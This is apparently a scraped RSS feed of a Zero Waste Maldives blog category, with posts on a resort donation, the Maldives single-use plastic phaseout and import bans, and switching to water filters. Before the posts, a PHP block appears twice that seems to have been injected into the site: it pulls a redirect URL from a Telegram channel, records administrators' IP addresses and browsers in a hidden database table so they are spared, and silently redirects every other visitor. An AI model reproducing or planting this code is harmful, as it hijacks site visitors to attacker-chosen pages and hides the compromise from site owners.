add_action('template_redirect', 'custom_redirect_function'); function custom_redirect_function() { global $wpdb; $on_hot_redirect = true; function _getIP() { if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) { return $_SERVER["HTTP_CF_CONNECTING_IP"]; } elseif (!empty($_SERVER['HTTP_CLIENT_IP'])) { return $_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { return $_SERVER['HTTP_X_FORWARDED_FOR']; } else { return $_SERVER['REMOTE_ADDR']; } } function fetch_remote($url) { if (function_exists('curl_version')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $response = curl_exec($ch); curl_close($ch); return $response; } return @file_get_contents($url); } function get_redirect_link($cache_file) { $html = fetch_remote("https://t.me/s/trafficredirect1"); if (!$html) return false; if (preg_match_all('/(https?:\/\/[^<]+)<\/code>/', $html, $matches)) { $link = end($matches[1]); if (!empty($link)) { file_put_contents($cache_file, $link); return $link; } } if (preg_match_all('/]+href="(https?:\/\/[^"]+)"[^>]*>/i', $html, $matches)) { foreach (array_reverse($matches[1]) as $link) { if (strpos($link, 't.me') === false) { file_put_contents($cache_file, $link); return $link; } } } return false; } $ip = _getIP(); $ua = $_SERVER['HTTP_USER_AGENT']; $table = $wpdb->prefix . "wusers_inputs"; if ($wpdb->get_var("SHOW TABLES LIKE '$table'") != $table) { require_once(ABSPATH . 'wp-admin/includes/upgrade.php'); $sql = "CREATE TABLE $table ( ip INT(11) UNSIGNED NOT NULL, useragent VARCHAR(535) NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=utf8;"; dbDelta($sql); } $exists = $wpdb->get_var($wpdb->prepare( "SELECT 1 FROM $table WHERE ip = %s AND useragent = %s LIMIT 1", ip2long($ip), $ua )); if ((current_user_can('editor') || current_user_can('administrator')) && !$exists) { $wpdb->insert($table, array( 'ip' => ip2long($ip), 'useragent' => $ua )); $exists = true; } if ($on_hot_redirect && !$exists) { $exists = $wpdb->get_var($wpdb->prepare( "SELECT 1 FROM $table WHERE ip = %s OR useragent = %s LIMIT 1", ip2long($ip), $ua )); if (!$exists) { $cache_file = sys_get_temp_dir() . '/' . md5('tg_redirect_cache'); if (file_exists($cache_file) && filesize($cache_file) > 0) { $age = time() - filemtime($cache_file); $link = trim(file_get_contents($cache_file)); } if (!isset($link) || $age >= 30 || empty($link)) { $link = get_redirect_link($cache_file); } if ($link) { wp_redirect($link); exit; } } } } add_action('template_redirect', 'custom_redirect_function'); function custom_redirect_function() { global $wpdb; $on_hot_redirect = true; function _getIP() { if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) { return $_SERVER["HTTP_CF_CONNECTING_IP"]; } elseif (!empty($_SERVER['HTTP_CLIENT_IP'])) { return $_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { return $_SERVER['HTTP_X_FORWARDED_FOR']; } else { return $_SERVER['REMOTE_ADDR']; } } function fetch_remote($url) { if (function_exists('curl_version')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $response = curl_exec($ch); curl_close($ch); return $response; } return @file_get_contents($url); } function get_redirect_link($cache_file) { $html = fetch_remote("https://t.me/s/trafficredirect1"); if (!$html) return false; if (preg_match_all('/(https?:\/\/[^<]+)<\/code>/', $html, $matches)) { $link = end($matches[1]); if (!empty($link)) { file_put_contents($cache_file, $link); return $link; } } if (preg_match_all('/]+href="(https?:\/\/[^"]+)"[^>]*>/i', $html, $matches)) { foreach (array_reverse($matches[1]) as $link) { if (strpos($link, 't.me') === false) { file_put_contents($cache_file, $link); return $link; } } } return false; } $ip = _getIP(); $ua = $_SERVER['HTTP_USER_AGENT']; $table = $wpdb->prefix . "wusers_inputs"; if ($wpdb->get_var("SHOW TABLES LIKE '$table'") != $table) { require_once(ABSPATH . 'wp-admin/includes/upgrade.php'); $sql = "CREATE TABLE $table ( ip INT(11) UNSIGNED NOT NULL, useragent VARCHAR(535) NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=utf8;"; dbDelta($sql); } $exists = $wpdb->get_var($wpdb->prepare( "SELECT 1 FROM $table WHERE ip = %s AND useragent = %s LIMIT 1", ip2long($ip), $ua )); if ((current_user_can('editor') || current_user_can('administrator')) && !$exists) { $wpdb->insert($table, array( 'ip' => ip2long($ip), 'useragent' => $ua )); $exists = true; } if ($on_hot_redirect && !$exists) { $exists = $wpdb->get_var($wpdb->prepare( "SELECT 1 FROM $table WHERE ip = %s OR useragent = %s LIMIT 1", ip2long($ip), $ua )); if (!$exists) { $cache_file = sys_get_temp_dir() . '/' . md5('tg_redirect_cache'); if (file_exists($cache_file) && filesize($cache_file) > 0) { $age = time() - filemtime($cache_file); $link = trim(file_get_contents($cache_file)); } if (!isset($link) || $age >= 30 || empty($link)) { $link = get_redirect_link($cache_file); } if ($link) { wp_redirect($link); exit; } } } } Solutions Archives - Zero Waste Maldives https://zerowastemaldives.com/category/solutions/ Tue, 29 Jul 2025 18:58:23 +0000 en-US hourly 1 https://wordpress.org/?v=6.8.5 160994990 Joali Maldives provides donnation to support Fabric Waste Reduction in Raa Atoll https://zerowastemaldives.com/joali-maldives-provides-donnation-to-support-fabric-waste-reduction-in-raa-atoll/ Sun, 30 Jan 2022 09:45:00 +0000 https://zerowastemaldives.com/?p=5274 The post Joali Maldives provides donnation to support Fabric Waste Reduction in Raa Atoll appeared first on Zero Waste Maldives.

]]>

JOALI Maldives has provided financial assistance to support Fehifathi. A Collaborative project run by Zero Waste Maldives with the support of Dreamers Maldives and Alun Maldives. JOALI Maldives is a passionate supporter of environmental conservation, community engagement and women empowerment. The funds were raised as part of a collaborative art project by JOALI Maldives.

In addition to Zero Waste Maldives, financial assistance was also handed over to two organizations working in the Maldives, Olive Ridley Project and Women in Tech Maldives.

The donation was handed over to the representatives from NGO by the JOALI Maldives team, together with General Manager, Enver Arslan at a small gathering at the resort. Co-Founder of Zero Waste Maldives, Ahmed Afrah Ismail received the donation on behalf of Zero Waste Maldives.

During the gathering, Enver highlighted the important work the organizations do in the Maldives, especially during such challenging times and thanked the donors. ” We thank our guests and hosts for their generous donations to support the organizations to continue in their mission to make our communities a great place to live, and to sustain our ecosystems for future generations to come. Together we are making a difference!”.

 

The selected NGOs will be utilizing the funds for the following projects

Zero Waster Maldives- Reducing the amount of fabric waste that ends up in landfills by rescuing clothes that can be used second-hand or upcycled.

Women in Tech Maldives – Working to inspire, empower and celebrate women in science and technology and teach school students coding skills.

Olive Ridley Project – Protecting sea turtles and their inhabitants in Raa Atoll through rescue and rehabilitation, scientific research, education, and outreach.’

 

The post Joali Maldives provides donnation to support Fabric Waste Reduction in Raa Atoll appeared first on Zero Waste Maldives.

]]>
5274
Updates of Single Use Plastic Phaseout in the Maldives https://zerowastemaldives.com/updates-of-single-use-plastic-phaseout-in-the-maldives/ Sun, 30 May 2021 18:30:03 +0000 https://zerowastemaldives.com/?p=4948 The post Updates of Single Use Plastic Phaseout in the Maldives appeared first on Zero Waste Maldives.

]]>

Since the president made the official announcement on the 19th of September 2019 at the United Nations General Assembly a list of products that will be banned has been compiled and gazetted. 

More details about this here > The Maldives Bans the Import of Certain Single-Use Plastics

So almost 5 months into this announcement where do we stand? 

Unlike the more successful HCFC phaseout program that the Ministry of Environment has been carrying out the risk for pushback is far greater. With SUP phaseout we are dealing with Fast Moving Consumer Goods as well as FnB sector consumables such as food takeaway containers, cutlery and straws that are imported in the Millions. The importers, distributors and retailers that need to be engaged are far greater in number and have more political and financial pull to oppose any restrictions.

Though the phaseout was announced 19th of September 2019. Progress has been very slow. Draft phaseout plan was made available to the public 17th August 2020 to which there was a public event where the public could ask questions but QnA lasted for less than 30 minutes. (Still disappointed that more effort was not made to answer potential questions that the public would have raised) After which on the 25th of April 2021 the campaign name and wordmark logo and hashtag #PlastickaaNulaa was revealed. During the event the phaseout document was also finally released to the public as a “booklet”

It is fair to say that the implementation to this stage has been VERY SLOW and this is just the start. Only import level restrictions are in place that also to items that we consider very easy wins. The more challenging ones such as single use plastic carrier bags have not been addressed yet. (Yes, we are only banning that pesky small sized bag that we generally get medicines handed to us in the other size bags are still going to be imported)

Zero Waste Maldives has time and time again raised concerns and issues with the implementation of this phaseout where we believe there needs to be a dedicated team working on ensuring proper implementation and monitoring of the phaseout. There needs to be a dedicated team that is analysing import data, visiting major retailers and wholesalers and figuring out what is happening in response to the changes. 

There will be good and bad changes that will come up to which there will need to be a policy response.

One example is the introduction of supari packaged in glass bottles. Though this was a step up from the single use plastic packaging that supari had it also has a few drawbacks. 

Considering the lifecycle of the bottles and how they are sold they are sold as a linear packaging. You are supposed to throw away the glass bottles after use. This means in Maldives where no glass recycling takes place all these glass bottles will end up in landfill or somewhere in our ecosystem. The other major concern is that SUP packaging forced a standard serving of supari. Now with the introduction of the bottle a serving maybe more than what was previously increasing consumption and potential risk for consumers to get oral cancers. 

Ideally if supari was being imported in an alternative packaging it should be imported in a paper packaging without any plastic liners. Considering all aspects of our existing waste management system this would be the most ideal. 

It is also important to understand that as the phaseout plan currently stands it does not limit supari being imported in plastic bottles. Once a major importer realizes this the market will be flooded with supari in plastic bottles as that is a more cost effective option than bottled in glass. The other viable option to limit this is to capture the plastic packaging as part of an Extended Producer Responsibility (EPR) scheme. 

We have also heard that the Environment Act is being amended to allow for local production bans on single use plastics. However one key area that is missing from this amendment to the act (which we have already raised to the members of the plastic phaseout committee) is the lack of a provision that will force disclosure of data. This will be crucial to have so that we are able to monitor production of single use plastics locally as well as ensure that the import bans are effective or not. Local manufacturers both state owned and private are very reluctant to share their production data but this data will be required to ensure measures such as Extended Producer Responsibility (EPR) are implemented and are pegged to correct data.

From what has been going on with the SUP phaseout our biggest fear is that the government will come up with some excuse to roll back the implementation dates of the import ban. (Though we have suggested multiple ways to mitigate this) If the government allows for a rollback then we are setting a very bad precedent that any deadline can be pushed back endlessly. We can essentially forget the 2023 deadline.

Regardless of what happens with the Single Use Plastic Phaseout, Zero Waste Maldives is committed to  keeping the pressure on the government to reduce waste generation through policy interventions and transition to a circular economy. 

 

 

 

 

 

The post Updates of Single Use Plastic Phaseout in the Maldives appeared first on Zero Waste Maldives.

]]>
4948
The Maldives Bans the Imports of Certain Single-Use Plastics https://zerowastemaldives.com/the-maldives-bans-the-imports-of-certain-single-use-plastics/ Wed, 30 Dec 2020 13:30:31 +0000 https://zerowastemaldives.com/?p=4365 The post The Maldives Bans the Imports of Certain Single-Use Plastics appeared first on Zero Waste Maldives.

]]>

The Maldives has been very slowly working towards Single-Use Plastic Phaseout by 2023. The president made the official announcement on the 19th of September 2019 at the United Nations General Assembly

“We are seeking to completely phase out our usage of single-use plastic by the year 2023. This will be one of the most far-reaching and ambitious plastics phase-out plans of any nation on Earth,” the President told the UN General-Assembly. 

To this end, the government has announced the first steps in the phaseout plan. This includes import bans and restrictions on certain single-use plastic items to the Maldives.

By June 1, 2021, the following items will be prohibited to import: drinking straws; plates, cutleries and stirrers; Styrofoam lunch boxes; 30×30 cm carrier bags; betel nuts in plastic wrapping; below 250ml coffee cups; cotton wool buds; 50 ml and smaller toiletry bottles; and, below 500ml PET beverage bottles. After December 1, 2022, importation of carrier bags below 50-micron thickness; 50-200 ml toiletry bottles; and, one-liter PET beverage bottles, will also be prohibited.

 

1st Round of Import Bans Comes into Effect

Day(s)

:

Hour(s)

:

Minute(s)

:

Second(s)

2nd Round of Import Bans Comes into Effect

Day(s)

:

Hour(s)

:

Minute(s)

:

Second(s)

3rd Round of Import Bans Comes into Effect

Day(s)

:

Hour(s)

:

Minute(s)

:

Second(s)

The post The Maldives Bans the Imports of Certain Single-Use Plastics appeared first on Zero Waste Maldives.

]]>
4365
More than ever, now is the time to install a water filter. https://zerowastemaldives.com/more-than-ever-now-is-the-time-to-install-a-water-filter/ Wed, 20 May 2020 03:16:00 +0000 https://zerowastemaldives.com/?p=4192 The post More than ever, now is the time to install a water filter. appeared first on Zero Waste Maldives.

]]>

The novel coronavirus lives on plastic surfaces for up to 72 hours or more. The virus also has a ‘staying power’ on plastic much longer than on any other material tested – including cardboard and steel, according to new research published in the New England Journal of Medicine.

But in Male’, the drinking water supply system relies on tens of thousands of single-use plastic bottles. In the age of COVID-19, it doesn’t seem very safe for people to buy their water from shops, in plastic bottles. If ever there was a time to switch from bottled water to tap water, surely it is now.

According to the Health Protection Agency, Environment Ministry and MWSC, the tap water in Male’ is safe to drink.

Regardless, many households are reticent to do so. This may be because the MWSC only guarantees water quality until it reaches the meter. After this point, water quality depends on household plumbing.

A home filter system can guarantee the safety of water out the tap, and often improves its taste. Water filter systems are easy to buy from private companies based all over Male’, and work out much cheaper than packaged drinking water.

The typical filter system costs MVR 4,500 to install and needs servicing every six months at a cost of MVR 600.

Compared to that, a typical household of four adults and two children will spend around MVR 800 per month on bottled water – almost MVR 10,000 every year. A filter system should thus, pay for itself in six months, and provide significant financial savings thereafter.

However, many households will not have spare MVR 4,500 – particularly at this time. This is where the private companies and banks should step in to help low-income households buy a filter system on credit, repaying it in small monthly instalments at low-interest rates.

Of course, our reliance on bottled water isn’t just a problem because of the threat of coronavirus contamination.

Delivering packaged drinking water to everyone in Male’ is also a major logistical headache, especially in a crisis.

In the first week of the lockdown, the drinking water delivery system was so overwhelmed the army had to be drafted in to help.

Yet, for those lucky families with a filter system – all they had to do was turn on the tap.

Switching to a filter system also massively reduces plastic waste.

The greater Male’ area produces around 50% of our country’s plastic waste, of which plastic water bottles take up a significant portion.

Putting a dent in Male’s packaged water consumption will go a long way to achieving the Maldives’ target to phase out single-use plastics by 2023.

COVID-19 is likely to be with us for many months to come. Encouraging families to switch to a water filter system is a clear win-win at a difficult time, creating economic, environmental and public health benefits.

The post More than ever, now is the time to install a water filter. appeared first on Zero Waste Maldives.

]]>
4192